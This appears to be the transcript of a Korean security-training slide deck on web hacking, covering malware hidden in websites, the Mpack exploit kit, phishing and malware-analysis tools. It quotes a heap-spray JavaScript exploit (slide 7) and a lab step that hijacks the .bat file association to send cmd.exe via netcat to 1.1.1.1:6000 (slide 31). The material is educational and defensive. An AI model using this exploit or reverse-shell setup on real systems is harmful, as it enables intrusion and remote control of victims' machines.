1 / 66

Section III 웹 해킹 고도화 기법과 웹 방화벽 보안상 향상 17. 웹 사이트 악성코드 은닉 18. 웹 해킹 툴 (Mpack) 19. 피싱

Section III 웹 해킹 고도화 기법과 웹 방화벽 보안상 향상 17. 웹 사이트 악성코드 은닉 18. 웹 해킹 툴 (Mpack) 19. 피싱 20. Web2.0 의 취약점 21. 홈 페이지변조 감시 22. 웹 보안 솔루션의 한계. 학습 포인트 1. 최근 웹 해킹 기법에 대한 이해 2. 최근 빠르게 성장하는 Web2.0 의 보안 문제점 3. 웹 방화벽에 대한 이해 및 효과적 활용방안. 17. 악성코드 은닉의 이해.

melosa
Télécharger la présentation

Section III 웹 해킹 고도화 기법과 웹 방화벽 보안상 향상 17. 웹 사이트 악성코드 은닉 18. 웹 해킹 툴 (Mpack) 19. 피싱

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Section III 웹 해킹 고도화 기법과 웹 방화벽 보안상 향상 17. 웹 사이트 악성코드 은닉 18. 웹 해킹 툴(Mpack) 19. 피싱 20. Web2.0의취약점 21. 홈 페이지변조 감시 22. 웹 보안 솔루션의 한계

  2. 학습 포인트 1. 최근 웹 해킹 기법에 대한 이해 2. 최근 빠르게 성장하는 Web2.0의 보안 문제점 3. 웹 방화벽에 대한 이해 및 효과적 활용방안

  3. 17. 악성코드 은닉의 이해

  4. 17. 악성코드 은닉의 이해 - 악용대상

  5. 17. 악성코드 은닉의 이해 - 악용사례 ○ MHTML URL Processing 취약점 악용 (1) Internet Explorer는 프로토콜 핸들러를 통해 MHTML 형식의 파일에 접근가능 (2) 그러나 IE가 프로토콜 핸들러(mk@MSITStore) 통해 접속할 수 없는 경우 (3) 대체 주소로 접근하고 실행 아래 샘플코드를 보면 로컬 시스템에 c:\nosuchfile.mht 파일이 존재하지 않을 때 원격지 http://www.XXX.com/exploit._chm::exploit.html 파일을 로컬 파일로 실행시킬 수 있다.

  6. 17. 악성코드 은닉의 이해 - 악용사례 ○ MS 웹 브라우저 7 버전 취약점 악용 홈 페이지를 해킹하여 페이지 중간에 링크(Iframe 태그)를 걸어 외부 URL 접속을 유도함

  7. 17. 악성코드 은닉의 이해 - 악용사례 ○ MS 웹 브라우저 7 버전 취약점 악용(계속) hankyong.cn/css/js.htm 접속시 아래와 같은 코드가 포함된 사이트로 접속되고 웹 브라우저의 취약점을 악용한 버퍼오버플로우 공격의 일종임 <script language="javascript">function spray(sc){var addre = 0x0a0a0a0a;var fucker = unescape;var doit = fucker(sc);var heapBlockSize = 0x100000;var payLoadSize = doit.length * 2;var spraySlideSize = heapBlockSize - (payLoadSize+0x038);var spraySlide = fucker("%u0a0a%u0a0a");spraySlide = getSpraySlide(spraySlide,spraySlideSize);heapBlocks = (addre - 0x100000)/heapBlockSize;memory = new Array();for (i=0;i<heapBlocks;i++){      memory[i] = spraySlide + doit;}}function getSpraySlide(spraySlide, spraySlideSize){while //seemen(spraySlide.length*2<spraySlideSize){      spraySlide += spraySlide;}spraySlide = spraySlide.substring(0,spraySlideSize/2);return spraySlide;}</script>

  8. 17. 악성코드 은닉의 이해 - 악용사례 ○ MS 웹 브라우저 7 버전 취약점 악용(계속) ESP buf buf void main(void) { char buf[5]; char attack=aa..a; // aa를 10개 입력 strcpy(buf, attack); } buf buf buf SFP EBP RET EIP 스택의 모습 cmd.exe 실행 메모리 구조

  9. 17. 악성코드 은닉의 이해 – Redirect 기법

  10. 17. 악성코드 은닉의 이해 – Redirect 기법

  11. 17. 악성코드 은닉의 이해 – Redirect 기법 Unescape() 및 unescape() 함수를 이용한 URI 인코딩(obfuscated 기법) escape('&#$%^')==>%26%23%24%25%5Eunescape('%26%23%24%25%5E')==>&#$%^ <script language=“javascript”> document.write(unescape(“%3Cscript….”); </script>

  12. 17. 악성코드 은닉의 이해 – Redirect 기법

  13. 17. 악성코드 은닉의 이해 – Redirect 기법 obfuscated 코드가 포함된 사이트 분석(1) 해당 파일을 클릭하여 사이트로 접속 – 위험한 방법 URL 확인

  14. 17. 악성코드 은닉의 이해 – Redirect 기법 obfuscated 코드가 포함된 사이트 분석(2) 이벤트를 화면으로 출력하는 형태로 변경

  15. 17. 악성코드 은닉의 이해 – Redirect 기법(ARP Spoofing)

  16. 17. 악성코드 은닉의 이해 – Redirect 기법(ARP Spoofing) • 감염의 특징 • 특정서버의 권한을 획득하고 악성 프로그램 설치 • 특정 서버에 설치된 악성코드가 주기적인 MAC주소 브로드캐스팅을 통해 웹 서버를 가장함 • ( 특정서버는 자신의 MAC주소를 웹 서버의 MAC주소라고 속이는 패킷을 LAN상에 전송 ) • (3) 사용자의 요청된 데이터를 변조하여 Response에 Iframe 악성 태그 삽입 철수 PC 공격자 영희 PC

  17. 17. 악성코드 은닉의 이해 – Redirect 기법 arp 프로토콜(static, dynamic) Who has the following ip : 141.23.56.23 It’s me My mac is a46e…

  18. 17. 악성코드 은닉의 이해 – Redirect 기법 arp 프로토콜(static, dynamic)

  19. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 • 파일을 만들어 직접 접속(단 offline상태에서 수행) • 프록시 도구를 이용하여 생성파일 클릭 – 자바스크립트 분석 및 URL 접속 • (3) 프로그램 소스 디버깅 툴을 이용한 분석

  20. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (3) 프로그램 소스 디버깅 툴을 이용한 분석(계속)

  21. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (4) 솔루션을 이용한 악성코드 탐지 기법 – Virus 검색 사이트

  22. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 • (5) 솔루션을 이용한 악성코드 탐지 기법 – 허니팟 • High Interaction HoneyPots • : 침입 이벤트 발생 시 시스템 변화를 모니터링하여 악성코드 탐지 • Low Interaction HoneyPots • : 사전 등록된 패턴을 이용하여 악성코드 탐지 그림. Spybye구성도

  23. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (5) 솔루션을 이용한 악성코드 탐지 기법 – 허니팟(Low Interactions HoneyPots)

  24. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (5) 레지스트리 분석을 통한 악성코드 탐지 기법 ① HKEY_CLASSES_ ROOT이 곳에 저장되는 것은 OLE 데이터와 파일의 각 확장자에 대한 정보, 각 파일과 프로그램간의 연결에 대한 정보가 들어 있다. HKEY_CLASSES_ROOT안에는 파일의 확장자들에대한 sub-tree 로 구성되는데 일반적으로 각 확장자는 파일 타입과 연결되어 있음 ② HKEY_CURRENT_ USER윈도우가 설치되어 있는 컴퓨터의 환경에 대한 설정이 담겨 있는 곳으로 하나의 윈도우를여러 명이 사용할 경우, 사용자들이 각각에 대한 ID 와 패스워드를 이용하여 윈도우에 접속했을 때 접속한 사용자가 맞추어 놓은 설정을 반영하기 위한 곳이다. ③ HKEY_ LOCAL_MACHINE컴퓨터에 설치된 하드웨어를 구동 시키는데 필요한 드라이버나 설정 사항에 관련된 정보를 모아 둔 곳이다. 프린터와 화면 설정 등과 같이 컴퓨터를 켜고 윈도우를 부팅할 시에 필요한 설정, 컴퓨터에 설치된 하드디스크 드라이브나 플로피 드라이브, 플러그앤 플레이를 지원하는 하드웨어에 관한 정보, 디바이스 드라이버나 시스템에서 사용하는 소프트웨어에 관한 전반적인 정보를 담고 있다.

  25. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (5) 레지스트리 분석을 통한 악성코드 탐지 기법 ④ HKEY_ USERHKEY_CURRENT_USER에 저장된 정보와 데스크 탑 설정, 네트워크 연결 등의 정보가 저장되어 있으며 USER.DAT에 저장한다. 즉, 윈도우를 사용하는 사람이 한 사람일 경우 모든설정 사항이 HKEY_CURRENT_USER의 내용과 일치하게 된다. ⑤ HKEY_CURRENT_CONFIG레지스트리 중에서 가장 단순한 부분으로 HKEY_LOCAL_MACHINE에 서브로 존재하는Config의 내용이 담겨 있다. 즉, 디스플레이와 프린터에 관한 설정만을 볼 수 있다. ⑥ HKEY_ DYN_ DATA윈도우 2000에서는 없어진 레지스트리로 자주 사용하는 하드웨어 장치의 정보를 따로 저장하는 윈도우의 모니터 역할의 정보가 담겨있다.

  26. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (5) 레지스트리 분석을 통한 악성코드 탐지 기법

  27. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (5) 레지스트리 분석을 통한 악성코드 탐지 기법 이름 : W32.Ogleon.A는 이동식 저장 장치를 통해 확산되는 웜 발견됨: 2007년 6월 26일 업데이트됨: 2007년 6월 28일 5:57:58 AM 유형: Worm 감염 길이: 282,491바이트 영향을 받는 시스템: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP 아래의 레지스트리 항목에 등록되어, 윈도우 시작 시 자동 실행HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"Microsoft Autorun14" = "%System%\ztinetzt.exe"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"Microsoft Autorun9" = "%System%\Ravasktao.exe"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"Microsoft Autorun7" = "%System%\nwiztlbu.exe"

  28. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (5) 레지스트리 분석을 통한 악성코드 탐지 기법 – Autoruns을 통한 시작 위치 확인

  29. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (6) 레지스트리 변조 파일 확장자 정보 연결을 결정하는 HKEY_CLASSES_ROOT 위치의 값을 조작

  30. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (6) 실습 – 레지스트리 변조 HKEY_LOCAL_MACHINE\CLASSES\batfile\shell\open\command 정보를 조작하여 로컬의 원도의 쉘(cmd)을 공격자에게 전송(TCP 6000 연결) TCP 6000 cmd.exe 로컬 공격자 Listening 6000번 사용자가 *.bat 실행 시 자동으로 start.bat 실행

  31. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (6) 실습 – 레지스트리 변조 BAT 확장자를 가진 파일 실행 시 윈도우 쉘(cmd)을 TCP 6000번으로 전송 원본 : [HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] @="\"%1\" %*" 변경 : C:\start.bat “%1” %* start.bat 내용 @echo off Start /I /MIN c:\nc 1.1.1.1 6000 –e cmd.exe

  32. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (7) 분석도구의 필요성 많은 실행 프로세스들을 가지고 있으며 이러한 프로세스 중에는 공격자가 실행시켜 놓은 악성프로그램이 실행되고 있거나 흔적이 남아 있을 수 있으니 자세히 확인해 볼 필요 있음

  33. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (7) 분석도구 종류

  34. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (7) 분석도구 - Icesword 프로세스, 네트워크, 시작 프로그램등의 상세한 정보를 제공하여 악성코드 탐지에 사용

  35. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (7) 분석도구 - GMER 시스템 스캔 기능을 통해 악성코드 사용여부를 검사할 수 있음

  36. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (7) 분석도구 - GMER

  37. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (7) 의심스런 프로세스 분석 방법(1) 프로세스의 실행 위치를 파악하여 프로그램의 목적(개발사, 설치 위치, 프로그램의 상세한 정보 등)을 파악하여 의심스런 프로세스 여부를 파악할 수 있음 IceSword 프로세스 실행 위치

  38. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (7) 의심스런 프로세스 분석 방법(2) 분석도구에서 확인된 프로세스의 용도를 알 수 없는 경우 http://www.liutilities.com/products/wintaskspro/processlibrary/

  39. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (7) 의심스런 프로세스 분석 방법(3) http://www.file.net

  40. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (7) 의심스런 프로세스 분석 방법(4) System C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe C:\WINDOWS\system32\svchost.exe C:\Program Files\Fasoo DRM\fph.exe C:\WINDOWS\system32\WinSPMsv.exe C:\WINDOWS\system32\ctfmon.exe C:\Program Files\Adobe\Acrobat 6.0\Distillr\acrotray.exe C:\WINDOWS\system32\smss.exe C:\WINDOWS\system32\csrss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\scvhost.exe C:\WINDOWS\system32\igfxtray.exe C:\WINDOWS\system32\hkcmd.exe

  41. 17. 악성코드 은닉의 이해 – 악성코드 분석 방법 (7) 의심스런 프로세스 분석 방법(5) File.net 검색 결과 If scvhost.exe is located in a subfolder of C:\Windows\System32 then the security rating is 71% dangerous. File size is 1682432 bytes. If scvhost.exe is located in a subfolder of "C:\Documents and Settings" then the security rating is 39% dangerous. File size is 27648 bytes (50% of all occurrence), 307678 bytes.

  42. 18. 웹 해킹 툴(Mpack) Mpack을 통한 감염 경로 Mpack Server

  43. 18. 웹 해킹 툴(Mpack) Mpack의 공격 과정 (1) MPack(v0.90)은 스스로 웹 사이트 취약점을 찾거나 공격하는 프로그램은 아님 (2) MPack 프로그램이 설치된 웹 사이트에 접속한 Client 브라우저의 HTTP_USER_AGENT 헤더를 분석하여 Client OS, 브라우저 종류/버전 그리고 서비스 팩 버전 등을 확인한다.(3) MPack은 분석된 Client 정보를 기반으로, 해당 Client에 존재할 수 있는 취약점에 해당하는 공격 코드를 Client 웹 브라우저에 응답 데이터로 전송한다. ROT-5 적용- MS06-014 : MDAC Code Execution- MS06-044 : Microsoft Management Console Code Execution- MS06-071 : XML overflow XP/2k3ROT-5 미 적용- MS06-006 : Firefox 1.5.x ?Opera 7.x – Window Media Player Code Execution- MS06-057 : Window Explorer Code Execution - WebViewFolderIcon overflow- WinZip ActiveX overflow- QuickTime overflow- MS07-017 : ANI overflow

  44. 18. 웹 해킹 툴(Mpack) Mpack의 공격 과정

  45. 18. 웹 해킹 툴(Mpack) Mpack 감염증상

  46. 19. 피싱 피싱(Private Information + Fishing) 개념 • 1) 취약한 사이트 시스템 권한을 획득하여 가짜 웹 사이트를 운영한다. • 무차별 메일 발송 ( 개인정보 만료가 되었으니 정보를 업 데이트 !! ) • 사용자 메일의 링크 사이트 클릭 • 사용자 개인 정보 입력, 공격자는 해당 정보를 이용하여 금융 거래를 한다.

  47. 19. 피싱 피싱(Private Information + Fishing) 개념

  48. 19. 피싱 URL 주소 변조 URL Redirection 링크 URL Typo

  49. 19. 피싱 URL Obfuscation IDN(Internationalized Domain Names은 영문자 대신 각 지역 언어의 문자를 그대로 사용하는 다국어 도메인 이름이다.

More Related